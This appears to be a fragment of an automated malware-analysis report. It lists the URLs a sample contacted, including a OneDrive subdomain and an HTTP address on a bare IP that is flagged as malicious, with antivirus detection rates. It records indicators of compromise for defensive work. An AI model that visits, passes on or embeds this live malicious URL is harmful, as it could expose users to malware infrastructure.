gnpnew.by.files.1drv.com unknown unknown

Contacted URLs

Name                                      Malicious  Antivirus Detection                       Reputation
http://51.195.53.221/p.php/594QbwaP456AN  true       11% (Virustotal); Avira URL Cloud: safe   unknown